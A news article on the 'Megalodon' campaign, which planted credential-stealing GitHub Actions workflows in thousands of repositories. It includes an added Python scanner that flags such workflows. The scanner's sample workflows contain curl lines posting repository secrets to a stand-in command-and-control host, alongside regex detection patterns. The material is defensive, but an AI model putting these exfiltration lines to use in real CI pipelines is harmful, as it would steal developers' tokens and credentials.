Tech News

Feeding Frenzy: 'Megalodon' Malware Infects Thousands of GitHub Repos

Why This Matters

The Megalodon malware campaign highlights the ongoing vulnerabilities in the software supply chain, especially within popular platforms like GitHub. Its sophisticated methods of stealth and credential theft pose significant risks to developers, organizations, and consumers relying on open-source code. This underscores the urgent need for enhanced security measures and vigilance in software development and distribution.

Key Takeaways

Thousands of GitHub repositories were poisoned with credential-stealing malware in the latest threat campaign to rock the beleaguered software supply chain.

In a May 21 blog post, cybersecurity startup SafeDep flagged an automated malware campaign, codenamed "Megalodon," that unfolded on May 18 in a six-hour window. In that brief amount of time, Megalodon managed to push 5,718 malicious commits to 5,561 GitHub repositories.

According to SafeDep, a threat actor used dummy accounts and forged author identities to inject GitHub Actions workflows with malicious payloads that exfiltrate CI/CD secrets, cloud credentials, SSH keys, OpenID Connect tokens, and source code secrets to a command-and-control (C2) server.

The Megalodon campaign follows a series of attacks this year that have seemingly spread at a rapid pace and upended the software supply chain.

Supply Chain Shark Hunts for Secrets

Megalodon is composed of two payloads, according to SafeDep. The primary payload adds a malicious workflow file named "SysDiag" that registers a new workflow, triggered whenever a push or pull request is made. The more targeted, secondary payload replaces existing workflows with a version that fires only on the `workflow_dispatch` trigger; this acts as a stealth backdoor that evades detection and generates no visible CI runs until it is activated.


"This makes the backdoor dormant. It creates no visible runs in the Actions tab, no failed builds, no red flags in CI history," the company stated in its blog, adding that an attacker can activate the backdoor through a GitHub API.
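The two workflow shapes described above can be picked out of a repository's `.github/workflows/` directory with a simple heuristic scan. The following Python script is an added example, not SafeDep's tooling or anything from the Tiledesk project: it flags a workflow file that was not present in a trusted baseline and runs on push or pull request, and an existing workflow whose only trigger is `workflow_dispatch` (dormant until fired through the API), raising a finding when either one also reads secrets and calls an outbound transfer tool in the same file. The sample workflows, the baseline set and the `c2.example.invalid` host are constructed for the example; the trigger parser is a minimal line-based one, not a full YAML parser, and a hit is a prompt for review rather than proof of compromise, since legitimate deploy workflows also combine secrets with `curl`.

```python
"""Heuristic scan of GitHub Actions workflow files for two Megalodon-style
patterns: (1) a workflow file that is new relative to a trusted baseline and
runs on push/pull_request, and (2) an existing workflow rewritten to fire only
on workflow_dispatch (no CI runs until triggered via the API). Either pattern
is escalated when the same file reads secrets and runs an outbound transfer tool.
Added example; not SafeDep's code. Sample inputs below are constructed."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    triggers: list
    reasons: list
    suspicious: bool


# ${{ secrets.NAME }} or ${{ toJSON(secrets) }} (the latter dumps every secret at once)
_SECRET_RE = re.compile(r"\$\{\{\s*(?:toJSON\(\s*secrets\s*\)|secrets\.[A-Za-z0-9_]+)")
# Outbound transfer tools commonly used in `run:` steps
_NET_RE = re.compile(r"\b(?:curl|wget|Invoke-WebRequest)\b")


def parse_triggers(text: str) -> list:
    """Return the trigger names under the top-level `on:` key.
    Handles `on: push`, `on: [push, pull_request]` and the block form
    (`on:` followed by indented keys or `- item` entries). Not a full YAML
    parser; sufficient for the shapes workflow files normally use."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^(?:on|\"on\"|'on'):\s*(.*)$", line)
        if not m:
            continue
        rest = m.group(1).split("#", 1)[0].strip()   # drop a trailing comment
        if rest.startswith("["):                        # flow list: on: [a, b]
            return [t.strip().strip("'\"") for t in rest.strip("[]").split(",") if t.strip()]
        if rest:                                        # scalar: on: push
            return [rest.strip("'\"")]
        triggers, base = [], None                       # block mapping / list
        for nxt in lines[i + 1:]:
            stripped = nxt.strip()
            if not stripped or stripped.startswith("#"):
                continue
            indent = len(nxt) - len(nxt.lstrip())
            if indent == 0:
                break                                   # next top-level key ends the block
            base = indent if base is None else base
            if indent == base:                          # only first-level children are triggers
                key = stripped.lstrip("- ").split(":", 1)[0].strip().strip("'\"")
                triggers.append(key)
        return triggers
    return []


def scan_workflow(path: str, text: str, baseline: set) -> Finding:
    """Score one workflow file. `baseline` is the set of workflow paths that existed
    before the window under investigation (for example, taken from a trusted tag)."""
    triggers = parse_triggers(text)
    reasons = []
    is_new = path not in baseline
    dormant = triggers == ["workflow_dispatch"]
    if is_new:
        reasons.append("workflow file not present in baseline")
    if dormant:
        reasons.append("only trigger is workflow_dispatch: no CI runs until fired via the API")
    reads_secrets = bool(_SECRET_RE.search(text))
    calls_out = bool(_NET_RE.search(text))
    if reads_secrets and calls_out:
        reasons.append("reads secrets and runs an outbound network tool in the same file")
    suspicious = reads_secrets and calls_out and (is_new or dormant)
    return Finding(path, triggers, reasons, suspicious)


def scan_all(workflows: dict, baseline: set) -> list:
    """Scan a {path: file_text} mapping and return one Finding per workflow."""
    return [scan_workflow(p, t, baseline) for p, t in workflows.items()]


# Constructed sample inputs: one benign workflow, one added "SysDiag"-style file,
# and one existing workflow rewritten to a dormant workflow_dispatch trigger.
SAMPLE_WORKFLOWS = {
    "ci.yml": (
        "name: CI\non: [push, pull_request]\njobs:\n  test:\n"
        "    runs-on: ubuntu-latest\n    steps:\n"
        "      - uses: actions/checkout@v4\n      - run: npm test\n"
    ),
    "sysdiag.yml": (
        "name: SysDiag\non: [push, pull_request]\njobs:\n  diag:\n"
        "    runs-on: ubuntu-latest\n    steps:\n"
        "      - run: curl -s -d \"${{ toJSON(secrets) }}\" https://c2.example.invalid/\n"
    ),
    "release.yml": (
        "name: Release\non:\n  workflow_dispatch:\njobs:\n  build:\n"
        "    runs-on: ubuntu-latest\n    steps:\n"
        "      - run: curl -d \"${{ secrets.NPM_TOKEN }}\" https://c2.example.invalid/\n"
    ),
}
SAMPLE_BASELINE = {"ci.yml", "release.yml"}   # sysdiag.yml is the newcomer

if __name__ == "__main__":
    for f in scan_all(SAMPLE_WORKFLOWS, SAMPLE_BASELINE):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{f.path:14} {flag:10} triggers={f.triggers} {'; '.join(f.reasons)}")
```

In practice the baseline comes from a known-good ref (a release tag or a commit before the reported window) and the scan runs over the current checkout; a finding is then confirmed by reading the file and by checking the Actions audit log for unexpected `workflow_dispatch` events.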

SafeDep first spotted Megalodon when the company's Malysis engine detected malicious activity in a bundled GitHub Actions workflow file for an npm package, @tiledesk/[email protected], part of the open-source chatbot platform Tiledesk. It turned out that Tiledesk had nine repositories that were backdoored, and the maintainers unknowingly published poisoned code to downstream users, inadvertently spreading Megalodon infections.

It's unclear why the campaign lasted only six hours. Abhisek Datta, security engineer at SafeDep, tells Dark Reading that the research team didn't observe any time limitation behavior in the analysis of Megalodon.
